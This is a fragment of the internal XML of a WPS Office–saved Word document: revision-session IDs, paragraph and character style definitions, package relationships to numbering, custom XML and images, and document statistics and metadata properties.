    <w:rsid w:val="00BD7BB0"/>
    <w:rsid w:val="00C4190F"/>
    <w:rsid w:val="00C50F2B"/>
    <w:rsid w:val="00C52BC1"/>
    <w:rsid w:val="00CE337A"/>
    <w:rsid w:val="00D93244"/>
    <w:rsid w:val="00DA05DC"/>
    <w:rsid w:val="00E0111D"/>
    <w:rsid w:val="00EA4DC5"/>
    <w:rsid w:val="00EC252E"/>
    <w:rsid w:val="00F071C4"/>
    <w:rsid w:val="00F1666B"/>
    <w:rsid w:val="00F62277"/>
    <w:rsid w:val="00F73FEB"/>
    <w:rsid w:val="00F921F6"/>
    <w:rsid w:val="00FE28D7"/>
    <w:rsid w:val="00FE2C1D"/>
    <w:rsid w:val="01505838"/>
    <w:rsid w:val="021C6624"/>
    <w:rsid w:val="03807A06"/>
    <w:rsid w:val="0B7A38A7"/>
    <w:rsid w:val="0BED2848"/>
    <w:rsid w:val="0D4F26BF"/>
    <w:rsid w:val="0D6D2037"/>
    <w:rsid w:val="0D7257D0"/>
    <w:rsid w:val="0DF6702C"/>
    <w:rsid w:val="0E8C6EF5"/>
    <w:rsid w:val="0EAC6E81"/>
    <w:rsid w:val="0EF07DF3"/>
    <w:rsid w:val="10B23359"/>
    <w:rsid w:val="10BB0DE7"/>
    <w:rsid w:val="10D46218"/>
    <w:rsid w:val="10EC5E29"/>
    <w:rsid w:val="12D57C90"/>
    <w:rsid w:val="13B14D19"/>
    <w:rsid w:val="170608F7"/>
    <w:rsid w:val="17981E51"/>
    <w:rsid w:val="17DF0111"/>
    <w:rsid w:val="18C227AC"/>
    <w:rsid w:val="19C66901"/>
    <w:rsid w:val="1B2C4A6E"/>
    <w:rsid w:val="1B75435D"/>
    <w:rsid w:val="1D1853AF"/>
    <w:rsid w:val="20273C62"/>
    <w:rsid w:val="216058A9"/>
    <w:rsid w:val="21E73573"/>
    <w:rsid w:val="2562197E"/>
    <w:rsid w:val="266C3DC5"/>
    <w:rsid w:val="280A06C0"/>
    <w:rsid w:val="283B4525"/>
    <w:rsid w:val="28515B77"/>
    <w:rsid w:val="2A334664"/>
    <w:rsid w:val="2B242F7A"/>
    <w:rsid w:val="2BD71AB0"/>
    <w:rsid w:val="2CD10A37"/>
    <w:rsid w:val="2DAF3B63"/>
    <w:rsid w:val="2E937F98"/>
    <w:rsid w:val="2EAC7A84"/>
    <w:rsid w:val="2EF9304D"/>
    <w:rsid w:val="2F9D6C07"/>
    <w:rsid w:val="31F67771"/>
    <w:rsid w:val="337C05A1"/>
    <w:rsid w:val="33965C26"/>
    <w:rsid w:val="34446F67"/>
    <w:rsid w:val="34687C8F"/>
    <w:rsid w:val="34940C10"/>
    <w:rsid w:val="34A84BA7"/>
    <w:rsid w:val="36527F50"/>
    <w:rsid w:val="36D61BC6"/>
    <w:rsid w:val="393D2C48"/>
    <w:rsid w:val="3B105B9D"/>
    <w:rsid w:val="3B360EA6"/>
    <w:rsid w:val="3C9B1067"/>
    <w:rsid w:val="3D6407A3"/>
    <w:rsid w:val="3DB249C8"/>
    <w:rsid w:val="3E182BFB"/>
    <w:rsid w:val="3EB865DA"/>
    <w:rsid w:val="417B4467"/>
    <w:rsid w:val="42C7755A"/>
    <w:rsid w:val="44556C65"/>
    <w:rsid w:val="46E65808"/>
    <w:rsid w:val="47642B67"/>
    <w:rsid w:val="47AE587F"/>
    <w:rsid w:val="49012912"/>
    <w:rsid w:val="499A026D"/>
    <w:rsid w:val="4CF13F50"/>
    <w:rsid w:val="4E2D6403"/>
    <w:rsid w:val="4E324336"/>
    <w:rsid w:val="4E5B273A"/>
    <w:rsid w:val="4EA81E3C"/>
    <w:rsid w:val="4EB62B4A"/>
    <w:rsid w:val="4F5E1B10"/>
    <w:rsid w:val="512E4AF8"/>
    <w:rsid w:val="522357B7"/>
    <w:rsid w:val="54A537BB"/>
    <w:rsid w:val="562B368E"/>
    <w:rsid w:val="565C1F84"/>
    <w:rsid w:val="573D6797"/>
    <w:rsid w:val="582D1C36"/>
    <w:rsid w:val="58B359BE"/>
    <w:rsid w:val="593C3DF6"/>
    <w:rsid w:val="5BCF27BE"/>
    <w:rsid w:val="5CB31D71"/>
    <w:rsid w:val="5CF16DE4"/>
    <w:rsid w:val="5E1C1392"/>
    <w:rsid w:val="5FC6554C"/>
    <w:rsid w:val="608260E1"/>
    <w:rsid w:val="60C70EC5"/>
    <w:rsid w:val="62614000"/>
    <w:rsid w:val="62F321E2"/>
    <w:rsid w:val="636D04FB"/>
    <w:rsid w:val="64D218A7"/>
    <w:rsid w:val="65527BF9"/>
    <w:rsid w:val="675F083F"/>
    <w:rsid w:val="67EB51A1"/>
    <w:rsid w:val="6A214490"/>
    <w:rsid w:val="6C08035C"/>
    <w:rsid w:val="6D0A40A5"/>
    <w:rsid w:val="6E945C5E"/>
    <w:rsid w:val="6EA63389"/>
    <w:rsid w:val="6EA7546C"/>
    <w:rsid w:val="6EDF18F0"/>
    <w:rsid w:val="70E400C1"/>
    <w:rsid w:val="71E54313"/>
    <w:rsid w:val="724704DB"/>
    <w:rsid w:val="72F86678"/>
    <w:rsid w:val="75295853"/>
    <w:rsid w:val="758D2002"/>
    <w:rsid w:val="75D11028"/>
    <w:rsid w:val="77011514"/>
    <w:rsid w:val="79297478"/>
    <w:rsid w:val="7BF151F5"/>
    <w:rsid w:val="7D2E379F"/>
    <w:rsid w:val="7F732BA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99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jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="24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qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="footer"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="10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6">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="5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8">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:ind w:firstLine="420" w:firstLineChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="9">
    <w:name w:val="批注框文本 字符"/>
    <w:basedOn w:val="7"/>
    <w:link w:val="2"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="页脚 字符"/>
    <w:basedOn w:val="7"/>
    <w:link w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="18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numbering" Target="numbering.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png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1308</Words>
  <Characters>1425</Characters>
  <Lines>11</Lines>
  <Paragraphs>5</Paragraphs>
  <TotalTime>36</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2728</CharactersWithSpaces>
  <Application>WPS Office_11.1.0.10009_F1E327BC-269C-435d-A152-05C5408002CA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2019-11-18T06:35:00Z</dcterms:created>
  <dc:creator>伊思默</dc:creator>
  <cp:lastModifiedBy>LTSC</cp:lastModifiedBy>
  <cp:lastPrinted>2024-09-26T04:01:00Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-30T07:16:02Z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2052-11.1.0.10009</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>F55C508CA94847CE95E91C6126540E07_13</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiOWYxYjkxMWE1YTdjMzgzZmNjZDY2ZmYwMWI1NGYzZDIiLCJ1c2VySWQiOiIyNDUwMjQ2ODMifQ==</vt:lpwstr>
  </property>
</Properties>
</file>